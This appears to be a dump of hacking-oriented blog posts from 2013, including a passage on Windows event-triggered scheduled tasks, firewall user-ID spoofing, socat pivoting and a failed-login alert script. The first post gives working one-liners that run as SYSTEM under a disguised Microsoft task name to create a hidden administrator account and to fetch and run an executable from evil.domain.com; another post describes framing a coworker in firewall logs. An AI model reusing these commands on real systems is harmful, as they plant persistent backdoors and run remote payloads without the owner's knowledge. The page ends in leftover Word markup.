<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New",Courier,monospace;"><span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New",Courier,monospace;"><span style="font-family: Times, "Times New Roman", serif;">oh wait there's 2 account names in that file, happily since the one we're looking for is the last one we don't have to get into any tricky stuff as that one will decide the errorlevel.</span></span></span></span></span></span></span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New",Courier,monospace;"><span style="font-family: Times, "Times New Roman", serif;">Then we end up with just:</span></span></span></span><br />
<br />
<span style="font-family: "Courier New",Courier,monospace;"> Account Name: Backupexec</span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New",Courier,monospace;"><span style="font-family: Times, "Times New Roman", serif;">Then we can do another pass to find the specific account we're looking for</span></span></span></span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New",Courier,monospace;"><span style="font-family: Times, "Times New Roman", serif;"> </span></span></span></span><span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New",Courier,monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New",Courier,monospace;">wevtutil qe security /rd:true /f:text /c:1 /q:"*[System/EventID=4740]" | find /i "account name" | find /i "triggeraccount"</span></span></span></span></span></span></span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New",Courier,monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New",Courier,monospace;"><span style="font-family: Times, "Times New Roman", serif;">Now would be a good moment to mention the 261 character limit, spaces included, for the /TR option of a scheduled task. Always with the restrictions..... no rest for the wicked.</span></span></span></span></span></span></span></span><br />
<br />
<br />
So we have to get that cut down a bit if we want to keep everything in just the task run option and not write extra stuff to disk. Lets cut out the net user comment part and nix the nul's.<br />
<br />
So we end up with this here:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">schtasks /create /tn "Microsoft\Windows\LocalEventLogRotate" /tr "\"cmd.exe\" /k wevtutil qe security /rd:true /f:text /c:1 /q:\"*[System/EventID=4740]\" | find /i \"Account Name:\" | find /i \"triggername\" && net user Backdoor 1R3AlG00dP@55w0rd /add /y /active:yes & net localgroup administrators Backdoor /add & exit" /f /ru system /ec Security /sc onevent /mo "*[System[Provider[@Name='Microsoft-Windows-Security-Auditing'] and EventID=4740]]"</span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New",Courier,monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New",Courier,monospace;"><span style="font-family: Times, "Times New Roman", serif;">We use our && command (&& = only execute if the previous command was successful) to continue execution if the triggeraccount name is found. We're sitting at a cool 256 characters for the /TR. We're doing good, targeted triggering, creating a user, adding to an administration group. </span></span></span></span></span></span></span></span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New",Courier,monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New",Courier,monospace;"><span style="font-family: Times, "Times New Roman", serif;">Having an account is cool, but if we don't have access to the server we're stuck looking through the window from the outside, no fun at all. We can do better.</span></span></span></span></span></span></span></span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New",Courier,monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New",Courier,monospace;"><span style="font-family: Times, "Times New Roman", serif;">Alright, same parameters as before, but we're going to bend the rule slightly about writing files to disk. We'll do a one liner FTP command to retrieve and execute a file. I used some formatting tricks to shoehorn everything in here.</span></span></span></span></span> </span></span></span><br />
<br /><span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New",Courier,monospace;">schtasks /create /tn "Microsoft\Windows\LocalEventLogRotate" /tr "\"cmd.exe\" /k set &wevtutil qe security /rd:true /f:text /c:1 /q:\"*[System/EventID=4740]\" | find /i \"bob\" &&echo user username> f&echo password>>f&echo bin>>f&echo get i.exe>>f&echo quit>>f&ftp -n -s:f evil.domain.com&start \"\" i.exe&exit" /f /ru system /ec Security /sc onevent /mo "*[System[Provider[@Name='Microsoft-Windows-Security-Auditing'] and EventID=4740]]"</span></span></span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New",Courier,monospace;"><span style="font-family: Times, "Times New Roman", serif;">We start out the same as before, querying the event log for the most recent locked account and see if it's our good friend bob. Then we set out to writing out our FTP script. Using a couple space cheats and short file names we manage to squeeze everything in. Note that you don't need spaces before or after an & or before or after the append >>. that saves us a bunch of characters which ends up being kind of a big deal since we're limited to 261 characters. Using a single letter for the FTP script file name (f) saves us more space.</span></span></span></span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New",Courier,monospace;"><span style="font-family: Times, "Times New Roman", serif;">Pretty slick right? What else can we do...</span></span></span></span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New",Courier,monospace;"><span style="font-family: Times, "Times New Roman", serif;">Run a task whenever a particular user logs out, change an accounts password back every time the password gets changed, setup a backdoor account if you get locked out / deleted, whatever windows creates an event for, you can create a task for. Your only limits are how specific you want execution to be and 261 characters. Other than that, the world is yours.</span> </span></span></span><br />
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-7776905799486744720.post-3821858615130781262013-07-17T06:37:00.002-10:002013-07-17T06:37:53.417-10:00Masquerading on Palo Alto User-ID TrackingA lot of next gen firewalls have the ability to tag web browsing with a user associated to the computer it came from. I'm going to show you how to change who the firewall thinks you are for Palo Alto User-ID, and likely other devices.<br />
<br />
Palo Alto uses a secondary software package called User-ID Agent. This software monitors the event log on domain controllers and pulls the username associated with a computer from the event log. So when you logon an event is registered with the domain controller, User-ID Agent pulls the info and updates it's data with who is logged in.<br />
<br />
If you do a runas /user:domain\user (must have the actual credentials) and start any application, that will register on the domain controller as a new logon to that computer and will adjust the user appropriately. It does not change back or register as "no user" if there is a logoff, only logons change it. So from that point on all traffic is associated with a different user, still your IP address but it says "User x was logged into the computer at this time".<br />
<br />
Palo Alto can do traffic filtering by user id, so if you knew the login for an account that is unrestricted, as far as the firewall rules are concerned, you could login as yourself, do a runas and start a cmd prompt (or whatever) then close it and all your traffic will be reported as belonging to the other user possibly bypassing rules setup to block other users traffic.<br />
<br />
Or you could hang some co-worker as you went to some horrific granny-tranny spanish-mistress bondage porn site and it got registered in the firewall logs and now HR and IT will be grilling some poor soul about their internet browsing habits. <br />
<br />
Things such as opening outlook will revert back to being reported as your user is logged into the computer as it authenticates to AD. Anything that authenticates to AD will create a logon event and will change the user reported as logged on to the computer.<br />
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-7776905799486744720.post-17643849579830544432013-07-17T05:40:00.000-10:002013-07-17T05:40:04.434-10:00Connect to an SSL page through a Socat ProxySo lets say you have a device, at a remote location, that has a SSL web page. You can only access it from the local subnet and you don't want to disrupt any users to kick them off their machine.... or you plan to bounce off a client there, maybe without their knowledge.<br />
<br />
We will make the following conditions for this example:<br />
You're in the 192.168.20.0/24 subnet.<br />
You can access subnet 192.168.3.0/24 <br />
192.168.3.11 - device with an ssl page that is accessible ONLY from the 192.168.3.x/24 subnet
192.168.3.20 - device you have access to on that subnet<br />
192.168.20.10 - your machine<br />
<br />
We can use Socat to make the connection because it has the option for an openssl connection type.<br />
<br />
Copy over Socat, and it's dependencies:<br />
cygcrypto-0.9.8.dll<br />
cygminires.dll<br />
cygncurses-8.dll<br />
cygreadline6.dll<br />
cygssl-0.9.8.dll<br />
cygwin1.dll<br />
cygwrap-0.dll<br />
to the 192.168.3.20 machine and issue the following command:<br />
<br />
socat TCP-LISTEN:8100,fork OPENSSL:192.168.3.x:443,verify=0<br />
<br />
This tells socat to start listening on 192.168.3.20 port 8100 (or whatever port is available), and fork incoming connections so it can handle multiple connections at a time.<br />
<br />
*Fork is not really necessary for this example, probably better to leave it out, but if you need multiple connections to the device you need the fork option.<br />
<br />
Then send that traffic over an openssl connection to 192.168.3.11 port 443 and NOT to verify the ssl cert for the page you're trying to connect to (verify=0).<br />
<br />
*You can change it to verify the ssl cert (verify=1) but if the certificate is not correct, ie self signed, or intended to be used on a public site and you're accessing it internally, etc. the connection will not succeed.<br />
<br />
Then on 192.168.20.10 open your browser and put in 192.168.3.20:8100. Viola you have access to your SSL site that requires a connection from the local subnet.<br />
<br />
Now, before we go any further the connection between 192.168.20.10 and 192.168.3.20 is NOT encrypted, that means anyone sniffing the traffic will see everything that's sent between 192.168.20.10 and 192.168.3.20. That's bad. Especially since you're probably going to have to type in credentials to access the page, and if the sniffer misses that, then there's still the cookie that can be stolen as well.<br />
<br />
Traffic between 192.168.3.20 and 192.168.3.11 IS encrypted, BUT since we have verify=0 it will accept a forged certificate. That's also bad. But if the device has an invalid cert to begin with there's nothing we can do about it.<br />
<br />
You can secure your connection between 192.168.3.20 and 192.168.20.10 by generating ssl certificates <a href="http://www.dest-unreach.org/socat/doc/socat-openssltunnel.html" target="_blank">Instructions can be found here</a> but that requires access to a system with openssl or some other cert signing software and since you're likely to be dealing with windows machines that's unlikely to be handy, but it can be done. You would need to change TCP-LISTEN to OPENSSL-LISTEN also.<br />
<br />
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-7776905799486744720.post-92057992728244536892013-04-26T06:40:00.001-10:002013-04-26T07:12:41.769-10:00AD Failed Login AlertingUsing the event triggers of Windows Server 2008 I've setup a script to alert me to failed login attempts and several other events of interest to me.<br />
<br />
Here's how it all rolls together:<br />
<br />
Someone fails a kerberos login, an Event Id 4771 gets logged on the DC. I've setup a task to run when this Event ID is triggered. Here's a solid page on how to do that if you're reading this and saying "wtf is this guy talking about" <a href="http://www.windowsecurity.com/articles-tutorials/authentication_and_encryption/Attaching-Tasks-Event-Viewer-Logs-Events.html" target="_blank">Tasks based on Event Log Activity</a><br />
<br />
At first I just had it setup to send me an email to let me know that a failed login had occurred. I quickly found out that there's a LOT of failed logins per day on my domain, ~100. We have a lot of users it makes sense now that I think about it and see how often it happens. Since in their infinite wisdom Microsoft didn't include an option to attach the event information to the email these emails were pretty useless.<br />
<br />
So now we need to find a way to get the information from the event log into an email.<br />
<br />
Wevtutil is a nifty little windows utility (included natively) that can query the event log and output the event info to a file. That's handy. I'll be honest the syntax is a but confusing to me but I got it to do what I needed.<br />
<br />
wevtutil qe security /rd:true /f:text /c:1 /q:"*[System/EventID=4771]" > file.txt<br />
<br />
"qe security" is to query the security log <br />
/rd:true is reverse direction, aka read from the newest event to the oldest<br />
/f:text is the output format, there are other options<br />
/c:1 find the first 1 event that matches<br />
/q: xpath query string. I'm not going to go into explaining xpath queries, google is your friend. This one says find all (*) from System EventID is equal to 4771 (failed login event ID). You can get very specific if you'd like with the query.<br />
<br />
Now, you can create two tasks to trigger in order when there's an event, so you could set things up like so:<br />
<br />
1. Failed login occurs, event is created in the Event Log.<br />
2. Task 1 for that event is triggered.<br />
3. Use Wevtutil to output the event information to a text file<br />
4. Task 2 for the event is triggered<br />
5. Email is sent and attached is the output from Wevutil<br />
<br />
I don't like that setup, seems overly complex in my mind no need for 2 tasks when we can have just 1 task and 1 script. I put a copy of my favorite command line emailer BLAT in the folder with my script and used that at the end of the script to send out the email.<br />
<br />
-=Script=-<br />
<span style="font-family: "Courier New",Courier,monospace;">@echo off </span><br />
<span style="font-family: "Courier New",Courier,monospace;">wevtutil qe security /rd:true /f:text /c:1 /q:"*[System/EventID=4771]" > X:\path\file.txt</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> </span> <br />
<span style="font-family: "Courier New",Courier,monospace;">X:\Path\blat.exe X:\path\wevtutiloutputfile.txt -server mail.domain.whatever -subject "Failed Login" -to you@domain.whatever -mailfrom FailedLogin@domain.whatever</span><br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">del /f /q X:\path\file.txt</span><br />
<br />
*you need to make sure you use the full path for everything OR set your task to start in the specified directory on the task options when you create the task. Task. Had to get one last one in there.<br />
<br />
Okay so now I get an email that a login has failed and I get the full info of the event log for that particular event. We're getting closer, however it's not as "human friendly" as I'd like it to be. Specifically it doesn't include the users full name, just the account login name, and it only gives the code for the failed login (0x18 for example) and doesn't tell you that 0x18 means bad username or password. There are many reasons that a login can fail and I for one don't want to try and remember what each error code means.<br />
<br />
So we need to massage the text into an output that has more useful information and is easily readable:<br />
<br />
-=Script=-<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">@echo off<br />wevtutil qe security /rd:true /f:text /c:1 /q:"*[System/EventID=4771]" > X:\Path\failed_login.txt<br /><br />type X:\Path\failed_login.txt | find /i "Account Name" > X:\Path\fail_alert.txt<br /><br />for /f "tokens=3" %%a in ('type X:\Path\failed_login.txt ^| find /i "Account Name"') do set accname=%%a<br /><br />for /f "tokens=2,* delims= " %%a in ('net user %accname% /domain ^| find /i "Full Name"') do echo Full Name: %%b >> X:\Path\fail_alert.txt<br /><br />type X:\Path\failed_login.txt | find /i "Client Address" >> X:\Path\fail_alert.txt<br /><br />type X:\Path\failed_login.txt | find "Failure Code:" >> X:\Path\fail_alert.txt<br /><br />for /f "tokens=2 Delims=x" %%a in ('type X:\Path\failed_login.txt ^| find "Failure Code:"') do set fail=%%a<br /><br />if %fail% == 17 echo Reason Failed: Users Password has Expired >> X:\Path\fail_alert.txt<br /><br />if %fail% == 12 echo Reason Failed: Account Disabled / Account Expired >> X:\Path\fail_alert.txt<br /><br />if %fail% == 18 echo Reason Failed: Bad Username or Password >> X:\Path\fail_alert.txt<br /><br />if %fail% == 25 echo Reason Failed: Workstation Clock too far out of Sync with DC >> X:\Path\fail_alert.txt<br /><br />for /f "tokens=2 delims=:" %%a in ('type X:\Path\failed_login.txt ^| find "Computer:"') do set frm=%%a<br /><br />echo Logged From: %frm% >> X:\Path\fail_alert.txt<br /><br />for /f "tokens=1,* delims=:" %%a in ('type X:\Path\failed_login.txt ^| find "Date:"') do set tme=%%b<br /><br />echo Logged At: %tme% >> X:\Path\fail_alert.txt<br /><br />X:\Path\blat.exe X:\Path\fail_alert.txt -server mailserver -subject "Failed Login" -to you@yourdomain.ext -mailfrom FailedLogin@yourdomain.ext<br /><br />del /f /q X:\Path\failed_login.txt<br /><br />del /f /q X:\Path\fail_alert.txt</span><br />
<br />
<br />
<br />
So what's going on here is this:<br />
<br />
We use wevtutil to query the security log and find the last 1 event with the ID of 4771 (failed login) and output the text of the event to a file (failed_login.txt)<br />
<br />
Then we search the file for the line with "Account Name" this gives us the user account name, output that to what will end up being the email body.<br />
<br />
Then we do the same search again, except this time we're going to set just the actual account name as a varaible not the whole line.<br />
<br />
Then we're going to query the domain for that account name and grab the Full Name (their actual name) value. Output that to the email body file.<br />
<br />
Then we search the event output again for the client address (computer the login attempt came from) and the reason it failed (failure code). Output those to the email body file.<br />
<br />
Then we do the search for the failure code again and set it as a variable.<br />
<br />
Then we run through some if statements to check if the failure code is one of the common failure codes. Output that to the email body file.<br />
<br />
*I didn't do a full list of all possible failure codes because there are only a few common ones that happen, also if the failure code isn't one of the common ones something unusual is probably happening and I'm going to have to look it up anyways. Kind of a way to alert me that I need to pay attention through lack of information. You can find a list of failure codes here: <a href="http://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=4771" target="_blank">Failure Codes</a><br />
<br />
Then we do a search through the wevtutil output again and find the computer that's reporting the failure. Set that as a variable and output it to the email body file, with some formatting.<br />
<br />
Then we do the same thing with the time / date. Output it to the email body file.<br />
<br />
Then we tell BLAT to do it's thing and send us an email.<br />
<br />
Then we clean up the files and wait to be triggered again.<br />
<br />
We end up getting an email with a body similar to this:<br />
<br />
<!--[if gte mso 9]><xml>
<o:OfficeDocumentSettings>
<o:AllowPNG/>
</o:OfficeDocumentSettings>
</xml><![endif]--><br />
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:View>Normal</w:View>
<w:Zoom>0</w:Zoom>
<w:TrackMoves/>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>EN-US</w:LidThemeOther>
<w:LidThemeAsian>X-NONE</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:EnableOpenTypeKerning/>
<w:DontFlipMirrorIndents/>
<w:OverrideTableStyleHps/>
</w:Compatibility>
<w:DoNotOptimizeForBrowser/>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="267">
<w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" Priority="39" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" Name="toc 9"/>
<w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
